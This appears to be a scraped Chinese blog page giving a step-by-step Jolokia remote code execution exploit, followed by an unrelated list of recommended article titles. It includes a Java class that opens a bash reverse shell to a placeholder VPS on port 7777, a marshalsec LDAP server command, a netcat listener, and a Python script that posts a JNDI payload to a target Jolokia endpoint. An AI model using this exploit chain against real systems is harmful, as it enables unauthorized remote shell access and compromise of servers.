利用步骤

1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.java

public class Exploit {public Exploit() {try {System.setSecurityManager(null);java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp/VPS地址/7777 0>&1`");} catch(Exception e) {e.printStackTrace();}}
}

2、在Exploit.java目录下开启一个web服务

python3 -m http.server 80

3、运行LDAP服务器在1389端口
marshalsec-0.0.3-SNAPSHOT-all.jar下载地址

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS地址/#Exploit 1389

4、nc开启监听

nc -lvp 7777

5、执行exp

import requests
#url = 'http://x.x.x.x/jolokia/..;/jolokia/'
url = 'http://x.x.x.x/jolokia'
headers = {"Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*","User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50","Content-Type": "application/x-www-form-urlencoded",}
data = '''{"type" : "read","mbean" : "java.lang:type=Memory","target" : {"url" : "service:jmx:rmi:///jndi/ldap://VPS地址:1389/Exploit"}
}'''
result = requests.post(url, headers=headers, data=data, timeout=5)

参考文章

https://xz.aliyun.com/t/2294
https://www.cnblogs.com/cwkiller/p/13397335.html

Jolokia RCE漏洞利用相关推荐

  1. webmin RCE漏洞利用及分析

    Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作. 利用条件:webmin <= 1.910 原因:官网 Sou ...

  2. php rce,批量thinkphp5的RCE漏洞利用

    蜜罐捕获攻击 212.237.14.55 - - [22/Dec/2018:13:17:50 +0800] "GET /public/index.php?s=/index/%09hink%0 ...

  3. 用友u8 注入RCE漏洞利用数据

    一.漏洞成因 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.用于SQL注入的POC POST /Proxy HTTP/1.1H ...

  4. Nagiosxi的一个RCE漏洞利用脚本

    登陆后的,比较鸡肋.4月份发现的,一直放着,后来看官网更新了,直接发出来吧.另外官方还有一个明显的sql注入没修复.不过也是登陆后,感兴趣的可以去看一下. 简要信息 版本: 5.6.13(5.6.11 ...

  5. Apache Log4j2 RCE漏洞利用反弹shell合集

    目录 一.漏洞描述 二.漏洞复现 1. bugku靶场 反弹shell 命令执行 2. 掌控安全 反弹shell 三.Burp扫描插件 四.修复建议 一.漏洞描述 2021年11月24日,阿里云安全团 ...

  6. html应用json 文件_安全研究 | Slack桌面应用程序的RCE漏洞+XSS漏洞

    对于Slack的桌面应用程序来说,一些应用内跳转.XSS.逻辑重定向和HTML或javascript注入bug,都有可能导致任意代码执行.这篇Writeup就讲述了作者通过构造HTML注入,绕过Sla ...

  7. php x24 x65 x6d x61,Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet 漏洞利用

    Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE漏洞利用 ...

  8. 010106漏洞利用

    6-1漏洞利用-FTP漏洞利用 1. FTP协议介绍 文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式.它 ...

  9. 利用 CocoaPods 服务器中的一个 RCE 漏洞,投毒数百万款app

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士 专栏·供应链安全 数字化时代,软件无处不在.软件如同社会中的"虚拟人",已经成为支撑社会正常运转的最基本元素之一,软件 ...

最新文章

  1. Linux bash管道符“|”使用介绍与例子
  2. Android AlarmManager 使用指南
  3. nginx代理人server结合tomcat采用
  4. android 7 创建文件夹,Android 在 res/layout 文件夹 下创建一个 子文件夹实例
  5. 四、Dynamic-programming algorithm Dynamic--LCS
  6. IOS开发之格式化日期时间
  7. 【youcans 的 OpenCV 例程 200 篇】110. 投影和雷登变换
  8. Java 基于javaMail的邮件发送(支持附件)
  9. Waymo无人车卷入严重事故!车身损毁严重,安全员受轻伤
  10. java this 方法,使用“this”用方法(用Java)
  11. [BZOJ5302][HAOI2018]奇怪的背包(DP)
  12. 除了搜岛国老师的作品,以图搜图还有什么骚操作?
  13. 多波次导弹发射中的规划问题(二)
  14. P、*P和P三者的区别
  15. 广度优先搜索:迷宫问题
  16. python3中datetime模块当前时间多加一天、一小时、一分钟
  17. 重装Intel核显后,设备管理器英特尔显卡属性这里报告了一个未启动设备(igfx)
  18. 如何根据LAC和CellID进行手机定位
  19. ADDS:设置域间信任 SID Filter Quarantining
  20. SpringBoot+Caffeine+Redis声明式缓存

热门文章

  1. 现场感受:PowerPoint 2010轻松打造耳目一新的演讲
  2. android html超链接颜色,如何在android中更改超链接的颜色
  3. 元气森林、波士顿咨询、毕马威等 20+ 嘉宾齐聚观远数据2022智能决策峰会
  4. 游戏加盟听起来新颖却是个传统互联网项目
  5. 三角有理式积分——万能代换公式详细推导
  6. oracle 启动mrp进程,dataguard中MRP无法启动的问题分析和解决
  7. Android下音频tinyalsa(tinymix/tinycap/tinyplay/tinypcminfo)--------mark详细
  8. 《大众创业做电商——淘宝与微店 开店 运营 推广 一册通》导读
  9. 安装VMware出现无效驱动器 解决方法
  10. HTML---JS移动端触屏事件touch详解